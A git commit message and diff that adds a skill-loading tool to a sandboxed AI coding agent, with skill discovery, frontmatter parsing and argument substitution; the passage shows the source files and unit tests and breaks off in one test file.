(1M context) * refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback) Two changes per user direction: 1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array. 2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast. Verified live on preview against \`recoupable/org-rostrum-pacific-...\` BEFORE this commit: - Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace) - Agent invoked \`skill({ skill: "recoup-api" })\` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header Full suite 3055/3055; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite: - lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists) - lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts - 2 new unit tests (standard path, trailing-slash tolerance) discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file). Full suite passes; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 2 +- lib/agent/__tests__/buildAgentTools.test.ts | 47 ++++- lib/agent/buildAgentTools.ts | 24 +-- lib/agent/tools/AgentContext.ts | 11 ++ lib/agent/tools/__tests__/skillTool.test.ts | 169 ++++++++++++++++++ lib/agent/tools/skillTool.ts | 87 +++++++++ .../handleChatWorkflowStream.test.ts | 13 ++ lib/chat/handleChatWorkflowStream.ts | 21 +++ lib/skills/__tests__/discoverSkills.test.ts | 158 ++++++++++++++++ lib/skills/__tests__/extractSkillBody.test.ts | 22 +++ lib/skills/__tests__/findSkillFile.test.ts | 34 ++++ .../getGlobalSkillsDirectory.test.ts | 15 ++ .../getSandboxSkillDirectories.test.ts | 23 +++ lib/skills/__tests__/getSkills.test.ts | 31 ++++ .../__tests__/injectSkillDirectory.test.ts | 14 ++ .../__tests__/parseSkillFrontmatter.test.ts | 56 ++++++ .../__tests__/substituteArguments.test.ts | 22 +++ lib/skills/discoverSkills.ts | 89 +++++++++ lib/skills/extractSkillBody.ts | 14 ++ lib/skills/findSkillFile.ts | 33 ++++ lib/skills/getGlobalSkillsDirectory.ts | 14 ++ lib/skills/getSandboxSkillDirectories.ts | 16 ++ lib/skills/getSkills.ts | 22 +++ lib/skills/injectSkillDirectory.ts | 11 ++ lib/skills/parseSkillFrontmatter.ts | 52 ++++++ lib/skills/skillTypes.ts | 76 ++++++++ lib/skills/substituteArguments.ts | 14 ++ 27 files changed, 1071 insertions(+), 19 deletions(-) create mode 100644 lib/agent/tools/__tests__/skillTool.test.ts create mode 100644 lib/agent/tools/skillTool.ts create mode 100644 lib/skills/__tests__/discoverSkills.test.ts create mode 100644 lib/skills/__tests__/extractSkillBody.test.ts create mode 100644 lib/skills/__tests__/findSkillFile.test.ts create mode 100644 lib/skills/__tests__/getGlobalSkillsDirectory.test.ts create mode 100644 lib/skills/__tests__/getSandboxSkillDirectories.test.ts create mode 100644 lib/skills/__tests__/getSkills.test.ts create mode 100644 lib/skills/__tests__/injectSkillDirectory.test.ts create mode 100644 lib/skills/__tests__/parseSkillFrontmatter.test.ts create mode 100644 lib/skills/__tests__/substituteArguments.test.ts create mode 100644 lib/skills/discoverSkills.ts create mode 100644 lib/skills/extractSkillBody.ts create mode 100644 lib/skills/findSkillFile.ts create mode 100644 lib/skills/getGlobalSkillsDirectory.ts create mode 100644 lib/skills/getSandboxSkillDirectories.ts create mode 100644 lib/skills/getSkills.ts create mode 100644 lib/skills/injectSkillDirectory.ts create mode 100644 lib/skills/parseSkillFrontmatter.ts create mode 100644 lib/skills/skillTypes.ts create mode 100644 lib/skills/substituteArguments.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index f9a894195..704035c64 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -42,7 +42,7 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe }); const modelMessages = convertToModelMessages(input.messages); - const tools = buildAgentTools(); + const tools = buildAgentTools({ skills: input.agentContext.skills }); const result = streamText({ model: gateway(input.modelId), system: agentCustomInstructions, diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts index 5478c59ca..fb5d99a5a 100644 --- a/lib/agent/__tests__/buildAgentTools.test.ts +++ b/lib/agent/__tests__/buildAgentTools.test.ts @@ -1,7 +1,7 @@ import { describe, it, expect } from "vitest"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; -const EXPECTED_TOOL_NAMES = [ +const BASE_TOOLS = [ "bash", "read", "write", @@ -13,19 +13,50 @@ const EXPECTED_TOOL_NAMES = [ ] as const; describe("buildAgentTools", () => { - it("returns a tools record with all 8 leaf tools registered", () => { + it("returns the 8 leaf tools by default (no skill registered when skills list is empty)", () => { const tools = buildAgentTools(); - for (const name of EXPECTED_TOOL_NAMES) { + for (const name of BASE_TOOLS) { expect(tools).toHaveProperty(name); } + expect(tools).not.toHaveProperty("skill"); + }); + + it("registers the skill tool when a non-empty skill catalog is provided", () => { + const tools = buildAgentTools({ + skills: [ + { + name: "commit", + description: "Make a commit", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }); + expect(tools).toHaveProperty("skill"); + for (const name of BASE_TOOLS) { + expect(tools).toHaveProperty(name); + } + }); + + it("omits the skill tool when an empty array is passed", () => { + const tools = buildAgentTools({ skills: [] }); + expect(tools).not.toHaveProperty("skill"); }); it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => { - const tools = buildAgentTools() as Record< - string, - { description?: unknown; inputSchema?: unknown; execute?: unknown } - >; - for (const name of EXPECTED_TOOL_NAMES) { + const tools = buildAgentTools({ + skills: [ + { + name: "foo", + description: "x", + path: "/p", + filename: "SKILL.md", + options: {}, + }, + ], + }) as Record; + for (const name of [...BASE_TOOLS, "skill"]) { const t = tools[name]!; expect(typeof t.description).toBe("string"); expect(t.inputSchema).toBeDefined(); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts index f9cbc2b39..393b32889 100644 --- a/lib/agent/buildAgentTools.ts +++ b/lib/agent/buildAgentTools.ts @@ -6,24 +6,27 @@ import { grepTool } from "@/lib/agent/tools/grepTool"; import { globTool } from "@/lib/agent/tools/globTool"; import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; +import { skillTool } from "@/lib/agent/tools/skillTool"; +import type { SkillMetadata } from "@/lib/skills/skillTypes"; /** * Factory for the full agent tool set passed into `streamText({ tools })`. - * Each tool reads its sandbox handle + recoup creds from `experimental_context` - * at execute time — the factory takes no arguments because the tools are - * stateless modulo that context. + * Each tool reads its sandbox handle + per-prompt context from + * `experimental_context` at execute time — the factory is otherwise stateless. * - * Currently ships 8 leaf tools: - * - bash, read, write, edit, grep, glob (sandbox / file ops) + * Currently ships 9 tools: + * - 6 file/shell: bash, read, write, edit, grep, glob * - todo_write (planning surface; stateless, echoes the list back) * - web_fetch (HTTP via curl inside the sandbox) + * - skill (load a project-level skill's SKILL.md; only registered when the + * sandbox has skills available, so models without any skill catalog + * don't see the tool at all and never call it speculatively) * - * Composite tools (`task` subagent, `ask_user_question` UI part, - * `skill` skill discovery) port in a follow-up PR — they require - * subagent context plumbing / UI rendering / skill discovery infra - * that isn't in api today. + * @param options.skills - Discovered skill catalog. When empty / undefined, + * `skill` is omitted from the tool record so the model doesn't see it. */ -export function buildAgentTools() { +export function buildAgentTools(options: { skills?: SkillMetadata[] } = {}) { + const hasSkills = (options.skills?.length ?? 0) > 0; return { bash: bashTool, read: readFileTool, @@ -33,6 +36,7 @@ export function buildAgentTools() { glob: globTool, todo_write: todoWriteTool, web_fetch: webFetchTool, + ...(hasSkills ? { skill: skillTool } : {}), }; } diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts index 63d2a1b7e..acb455164 100644 --- a/lib/agent/tools/AgentContext.ts +++ b/lib/agent/tools/AgentContext.ts @@ -1,4 +1,5 @@ import type { VercelState } from "@/lib/sandbox/vercel/state"; +import type { SkillMetadata } from "@/lib/skills/skillTypes"; /** * Per-tool-call context threaded into the agent via `streamText`'s @@ -31,4 +32,14 @@ export type AgentContext = { * Public information — no security risk in exposing. */ recoupOrgId?: string; + /** + * Skills discovered in the sandbox before workflow start (handler + * calls `discoverSkills(sandbox, getSandboxSkillDirectories(sandbox))`). + * The `skillTool` reads this list to: + * - resolve names → SKILL.md paths + * - filter out skills with `disable-model-invocation` + * - surface "Available skills" hints when a model picks an unknown name + * Empty / undefined when the sandbox has no `skills/` directory. + */ + skills?: SkillMetadata[]; }; diff --git a/lib/agent/tools/__tests__/skillTool.test.ts b/lib/agent/tools/__tests__/skillTool.test.ts new file mode 100644 index 000000000..0b3196dbc --- /dev/null +++ b/lib/agent/tools/__tests__/skillTool.test.ts @@ -0,0 +1,169 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { skillTool } from "@/lib/agent/tools/skillTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const baseCtx = { + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, +}; + +function makeSandbox(readFile: ReturnType) { + return { workingDirectory: "/sandbox/mono", readFile }; +} + +function skillMd(body: string) { + return `---\nname: commit\ndescription: Make a commit\n---\n\n${body}`; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("skillTool", () => { + it("returns success:false with available skills when the requested skill isn't in context", async () => { + vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never); + const result = (await skillTool.execute!({ skill: "unknown" }, { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "Make a commit", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + { + name: "deploy", + description: "Deploy", + path: "/sandbox/mono/skills/deploy", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/Available skills: commit, deploy/); + }); + + it("returns success:false when no skills are loaded", async () => { + vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never); + const result = (await skillTool.execute!({ skill: "commit" }, { + experimental_context: { ...baseCtx, skills: [] }, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/Available skills: none/); + }); + + it("matches the skill name case-insensitively (slash-command behavior)", async () => { + const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd("body content"))); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await skillTool.execute!( + { skill: "COMMIT" }, // model typed it loud + { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "x", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never, + )) as { success: boolean; skillName: string }; + expect(result.success).toBe(true); + expect(result.skillName).toBe("COMMIT"); + }); + + it("returns the SKILL.md body with skill directory injected", async () => { + const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd("Run git commit -m ..."))); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await skillTool.execute!({ skill: "commit" }, { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "x", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never)) as { success: boolean; content: string; skillPath: string }; + expect(result.success).toBe(true); + expect(result.skillPath).toBe("/sandbox/mono/skills/commit"); + expect(result.content).toContain("Skill directory: /sandbox/mono/skills/commit"); + expect(result.content).toContain("Run git commit -m ..."); + expect(sb.readFile).toHaveBeenCalledWith("/sandbox/mono/skills/commit/SKILL.md", "utf-8"); + }); + + it("substitutes $ARGUMENTS in the skill body when args are provided", async () => { + const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd('git commit -m "$ARGUMENTS"'))); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await skillTool.execute!({ skill: "commit", args: "fix bug" }, { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "x", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never)) as { content: string }; + expect(result.content).toContain('git commit -m "fix bug"'); + expect(result.content).not.toContain("$ARGUMENTS"); + }); + + it("rejects skills with disable-model-invocation set", async () => { + vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never); + const result = (await skillTool.execute!({ skill: "internal" }, { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "internal", + description: "x", + path: "/sandbox/mono/skills/internal", + filename: "SKILL.md", + options: { disableModelInvocation: true }, + }, + ], + }, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/cannot be invoked/); + }); + + it("returns success:false when the SKILL.md read fails", async () => { + const sb = makeSandbox(vi.fn().mockRejectedValue(new Error("ENOENT"))); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await skillTool.execute!({ skill: "commit" }, { + experimental_context: { + ...baseCtx, + skills: [ + { + name: "commit", + description: "x", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + options: {}, + }, + ], + }, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/ENOENT/); + }); +}); diff --git a/lib/agent/tools/skillTool.ts b/lib/agent/tools/skillTool.ts new file mode 100644 index 000000000..8c74f35d1 --- /dev/null +++ b/lib/agent/tools/skillTool.ts @@ -0,0 +1,87 @@ +import * as path from "path"; +import { tool } from "ai"; +import { z } from "zod"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { extractSkillBody } from "@/lib/skills/extractSkillBody"; +import { getSkills } from "@/lib/skills/getSkills"; +import { injectSkillDirectory } from "@/lib/skills/injectSkillDirectory"; +import { substituteArguments } from "@/lib/skills/substituteArguments"; + +const skillInputSchema = z.object({ + skill: z.string().describe("The skill name to invoke"), + args: z.string().optional().describe("Optional arguments for the skill"), +}); + +/** + * `skill` — load a project-level skill's SKILL.md body and return it + * to the model. The model then follows the loaded instructions in + * subsequent turns (using `bash`, `read`, `write`, etc. to actually + * carry them out). The skill catalog itself is discovered in the + * handler before workflow start and threaded via `AgentContext.skills`. + * + * Matching is case-insensitive so the model can resolve a slash command + * like `/Commit` against a skill named `commit`. Skills marked with + * `disable-model-invocation` in their frontmatter are filtered out at + * the gate — only the user (via a server-side dispatcher) can run them. + */ +export const skillTool = tool({ + description: `Execute a skill within the main conversation. + +When users ask you to perform tasks, check if any of the available skills can help complete the task more effectively. Skills provide specialized capabilities and domain knowledge. + +When users ask you to run a "slash command" or reference "/" (e.g., "/commit", "/review-pr"), they are referring to a skill. Use this tool to invoke the corresponding skill. + +How to invoke: +- Use this tool with the skill name and optional arguments +- Examples: + - skill: "pdf" — invoke the pdf skill + - skill: "commit", args: "-m 'Fix bug'" — invoke with arguments + +Important: +- When a skill is relevant, invoke this tool IMMEDIATELY as your first action +- When the user's message starts with "/", they are invoking a skill — call this tool FIRST before any other tool +- NEVER just announce or mention a skill without actually calling this tool +- Only use skills listed in "Available skills" in your system prompt`, + inputSchema: skillInputSchema, + execute: async ({ skill, args }, { experimental_context }) => { + const sandbox = await getSandbox(experimental_context, "skill"); + const skills = getSkills(experimental_context); + + const normalized = skill.toLowerCase(); + const found = skills.find(s => s.name.toLowerCase() === normalized); + if (!found) { + const available = skills.map(s => s.name).join(", "); + return { + success: false, + error: `Skill '${skill}' not found. Available skills: ${available || "none"}`, + }; + } + + if (found.options.disableModelInvocation) { + return { + success: false, + error: `Skill '${skill}' cannot be invoked by the model (disable-model-invocation is set)`, + }; + } + + const skillFilePath = path.join(found.path, found.filename); + let fileContent: string; + try { + fileContent = await sandbox.readFile(skillFilePath, "utf-8"); + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Failed to read skill file: ${message}` }; + } + + const body = extractSkillBody(fileContent); + const bodyWithDir = injectSkillDirectory(body, found.path); + const content = substituteArguments(bodyWithDir, args); + + return { + success: true, + skillName: skill, + skillPath: found.path, + content, + }; + }, +}); diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts index fb3b434f1..702edb918 100644 --- a/lib/chat/__tests__/handleChatWorkflowStream.test.ts +++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts @@ -39,6 +39,19 @@ vi.mock("@/lib/networking/getCorsHeaders", () => ({ })); vi.mock("@/lib/uuid/generateUUID", () => ({ default: vi.fn(() => "deterministic-uuid") })); +// Stub sandbox connection + skill discovery so handler tests don't actually +// try to talk to Vercel Sandbox / parse SKILL.md files. The handler treats +// discovery failures as non-fatal (empty catalog), but we mock to keep tests fast. +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(async () => ({ workingDirectory: "/sandbox/mono" })), +})); +vi.mock("@/lib/skills/discoverSkills", () => ({ + discoverSkills: vi.fn(async () => []), +})); +vi.mock("@/lib/skills/getSandboxSkillDirectories", () => ({ + getSandboxSkillDirectories: vi.fn(() => ["/sandbox/mono/skills"]), +})); + const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; const SESSION_ID = "22222222-2222-2222-2222-222222222222"; diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts index 6ceb0c867..818c70f8c 100644 --- a/lib/chat/handleChatWorkflowStream.ts +++ b/lib/chat/handleChatWorkflowStream.ts @@ -15,7 +15,10 @@ import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow"; import { extractOrgId } from "@/lib/recoupable/extractOrgId"; import { DEFAULT_WORKING_DIRECTORY } from "@/lib/sandbox/vercel/sandbox/constants"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; import type { VercelState } from "@/lib/sandbox/vercel/state"; +import { discoverSkills } from "@/lib/skills/discoverSkills"; +import { getSandboxSkillDirectories } from "@/lib/skills/getSandboxSkillDirectories"; import generateUUID from "@/lib/uuid/generateUUID"; const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5"; @@ -90,6 +93,23 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise> = []; + try { + const sandbox = await connectVercel(session.sandbox_state as VercelState); + const dirs = await getSandboxSkillDirectories(sandbox); + skills = await discoverSkills(sandbox, dirs); + } catch (error) { + console.error( + "[handleChatWorkflowStream] skill discovery failed; continuing with empty catalog:", + error, + ); + } + const run = await start(runAgentWorkflow, [ { messages: validated.messages, @@ -105,6 +125,7 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise isDir, isFile: () => !isDir, size: 0, mtimeMs: 0 }; +} + +function makeDirent(name: string, isDir: boolean) { + return { + name, + isDirectory: () => isDir, + isFile: () => !isDir, + isSymbolicLink: () => false, + isBlockDevice: () => false, + isCharacterDevice: () => false, + isFIFO: () => false, + isSocket: () => false, + }; +} + +function frontmatter(name: string, description: string, extra = "") { + return `---\nname: ${name}\ndescription: ${description}\n${extra}---\n\nBody for ${name}`; +} + +function makeSandbox() { + const files = new Map(); + return { + files, + workingDirectory: "/sandbox/mono", + stat: vi.fn(async (path: string) => { + if (path.endsWith("/skills")) return makeStat(true); + if (path.startsWith("/sandbox/mono/skills/") && !path.endsWith(".md")) return makeStat(true); + throw new Error(`ENOENT: ${path}`); + }), + readdir: vi.fn(), + access: vi.fn(async (path: string) => { + if (!files.has(path)) throw new Error(`ENOENT: ${path}`); + }), + readFile: vi.fn(async (path: string) => { + const content = files.get(path); + if (content === undefined) throw new Error(`ENOENT: ${path}`); + return content; + }), + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("discoverSkills", () => { + it("discovers a single skill with name + description + path", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("commit", true)]); + sb.files.set("/sandbox/mono/skills/commit/SKILL.md", frontmatter("commit", "Make a commit")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]).toMatchObject({ + name: "commit", + description: "Make a commit", + path: "/sandbox/mono/skills/commit", + filename: "SKILL.md", + }); + }); + + it("falls back to lowercase skill.md when SKILL.md is missing", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("lowercase", true)]); + sb.files.set("/sandbox/mono/skills/lowercase/skill.md", frontmatter("lowercase", "lc")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.filename).toBe("skill.md"); + }); + + it("returns [] when the directory does not exist", async () => { + const sb = makeSandbox(); + sb.stat.mockRejectedValue(new Error("ENOENT")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toEqual([]); + }); + + it("skips entries that aren't directories", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("README.md", false), makeDirent("good", true)]); + sb.files.set("/sandbox/mono/skills/good/SKILL.md", frontmatter("good", "yes")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.name).toBe("good"); + }); + + it("skips subdirs without SKILL.md / skill.md", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("empty", true), makeDirent("real", true)]); + sb.files.set("/sandbox/mono/skills/real/SKILL.md", frontmatter("real", "yes")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.name).toBe("real"); + }); + + it("skips skills with invalid frontmatter (missing required fields)", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("broken", true), makeDirent("ok", true)]); + sb.files.set("/sandbox/mono/skills/broken/SKILL.md", "---\nname: broken\n---\nno desc"); + sb.files.set("/sandbox/mono/skills/ok/SKILL.md", frontmatter("ok", "yes")); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.name).toBe("ok"); + }); + + it("skips skills whose names shadow built-in commands (model / resume / new)", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([ + makeDirent("model", true), + makeDirent("resume", true), + makeDirent("new", true), + makeDirent("kept", true), + ]); + for (const name of ["model", "resume", "new", "kept"]) { + sb.files.set(`/sandbox/mono/skills/${name}/SKILL.md`, frontmatter(name, "x")); + } + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills.map(s => s.name)).toEqual(["kept"]); + }); + + it("dedupes by name across multiple directories (first wins, case-insensitive)", async () => { + const sb = makeSandbox(); + sb.readdir.mockImplementation(async (dir: string) => { + if (dir === "/sandbox/mono/skills") return [makeDirent("Foo", true)] as never; + if (dir === "/global/.skills") return [makeDirent("foo", true)] as never; + return []; + }); + sb.files.set("/sandbox/mono/skills/Foo/SKILL.md", frontmatter("Foo", "project")); + sb.files.set("/global/.skills/foo/SKILL.md", frontmatter("foo", "global")); + sb.stat.mockImplementation(async (p: string) => { + if (p === "/sandbox/mono/skills" || p === "/global/.skills") return makeStat(true); + throw new Error("ENOENT"); + }); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills", "/global/.skills"]); + expect(skills).toHaveLength(1); + expect(skills[0]?.description).toBe("project"); // first dir wins + }); + + it("populates options from frontmatter (camelCase + split lists)", async () => { + const sb = makeSandbox(); + sb.readdir.mockResolvedValue([makeDirent("scoped", true)]); + sb.files.set( + "/sandbox/mono/skills/scoped/SKILL.md", + frontmatter( + "scoped", + "limited", + "allowed-tools: bash, read\ndisable-model-invocation: true\n", + ), + ); + const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]); + expect(skills[0]?.options).toEqual({ + disableModelInvocation: true, + allowedTools: ["bash", "read"], + }); + }); +}); diff --git a/lib/skills/__tests__/extractSkillBody.test.ts b/lib/skills/__tests__/extractSkillBody.test.ts new file mode 100644 index 000000000..b8f62bbc8 --- /dev/null +++ b/lib/skills/__tests__/extractSkillBody.test.ts @@ -0,0 +1,22 @@ +import { describe, it, expect } from "vitest"; +import { extractSkillBody } from "@/lib/skills/extractSkillBody"; + +describe("extractSkillBody", () => { + it("strips YAML frontmatter and returns the body", () => { + const md = "---\nname: foo\ndescription: bar\n---\n# Heading\n\nBody."; + expect(extractSkillBody(md)).toBe("# Heading\n\nBody."); + }); + + it("returns the full content when no frontmatter is present", () => { + expect(extractSkillBody("# Just a heading")).toBe("# Just a heading"); + }); + + it("trims surrounding whitespace", () => { + expect(extractSkillBody("---\nname: x\ndescription: y\n---\n\n\nbody\n\n")).toBe("body"); + }); + + it("tolerates Windows-style CRLF line endings", () => { + const md = "---\r\nname: foo\r\ndescription: bar\r\n---\r\nbody"; + expect(extractSkillBody(md)).toBe("body"); + }); +}); diff --git a/lib/skills/__tests__/findSkillFile.test.ts b/lib/skills/__tests__/findSkillFile.test.ts new file mode 100644 index 000000000..2d15de6fa --- /dev/null +++ b/lib/skills/__tests__/findSkillFile.test.ts @@ -0,0 +1,34 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { findSkillFile } from "@/lib/skills/findSkillFile"; + +beforeEach(() => vi.clearAllMocks()); + +function makeSandbox(existing: string[]) { + const set = new Set(existing); + return { + access: vi.fn(async (p: string) => { + if (!set.has(p)) throw new Error(`ENOENT: ${p}`); + }), + }; +} + +describe("findSkillFile", () => { + it("prefers uppercase SKILL.md when both casings exist", async () => { + const sb = makeSandbox(["/skills/foo/SKILL.md", "/skills/foo/skill.md"]); + const result = await findSkillFile(sb as never, "/skills/foo"); + expect(result).toBe("/skills/foo/SKILL.md"); + expect(sb.access).toHaveBeenCalledWith("/skills/foo/SKILL.md"); + }); + + it("falls back to lowercase skill.md when SKILL.md is missing", async () => { + const sb = makeSandbox(["/skills/foo/skill.md"]); + const result = await findSkillFile(sb as never, "/skills/foo"); + expect(result).toBe("/skills/foo/skill.md"); + }); + + it("returns null when neither casing exists", async () => { + const sb = makeSandbox([]); + const result = await findSkillFile(sb as never, "/skills/foo"); + expect(result).toBeNull(); + }); +}); diff --git a/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts b/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts new file mode 100644 index 000000000..7833f2450 --- /dev/null +++ b/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts @@ -0,0 +1,15 @@ +import { describe, it, expect } from "vitest"; +import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory"; + +describe("getGlobalSkillsDirectory", () => { + it("returns /.agents/skills", () => { + expect(getGlobalSkillsDirectory("/root")).toBe("/root/.agents/skills"); + expect(getGlobalSkillsDirectory("/home/vercel-sandbox")).toBe( + "/home/vercel-sandbox/.agents/skills", + ); + }); + + it("handles trailing slash on input", () => { + expect(getGlobalSkillsDirectory("/root/")).toBe("/root/.agents/skills"); + }); +}); diff --git a/lib/skills/__tests__/getSandboxSkillDirectories.test.ts b/lib/skills/__tests__/getSandboxSkillDirectories.test.ts new file mode 100644 index 000000000..5762ccea1 --- /dev/null +++ b/lib/skills/__tests__/getSandboxSkillDirectories.test.ts @@ -0,0 +1,23 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { getSandboxSkillDirectories } from "@/lib/skills/getSandboxSkillDirectories"; +import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory"; + +vi.mock("@/lib/sandbox/resolveSandboxHomeDirectory", () => ({ + resolveSandboxHomeDirectory: vi.fn(), +})); + +beforeEach(() => vi.clearAllMocks()); + +describe("getSandboxSkillDirectories", () => { + it("returns just the global skill dir under the resolved $HOME", async () => { + vi.mocked(resolveSandboxHomeDirectory).mockResolvedValue("/home/vercel-sandbox"); + const dirs = await getSandboxSkillDirectories({ workingDirectory: "/sandbox/mono" } as never); + expect(dirs).toEqual(["/home/vercel-sandbox/.agents/skills"]); + }); + + it("works with the /root fallback (open-agents base image)", async () => { + vi.mocked(resolveSandboxHomeDirectory).mockResolvedValue("/root"); + const dirs = await getSandboxSkillDirectories({ workingDirectory: "/x" } as never); + expect(dirs).toEqual(["/root/.agents/skills"]); + }); +}); diff --git a/lib/skills/__tests__/getSkills.test.ts b/lib/skills/__tests__/getSkills.test.ts new file mode 100644 index 000000000..8ffd47e24 --- /dev/null +++ b/lib/skills/__tests__/getSkills.test.ts @@ -0,0 +1,31 @@ +import { describe, it, expect } from "vitest"; +import { getSkills } from "@/lib/skills/getSkills"; + +const validCtx = { + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, +}; + +const sample = { + name: 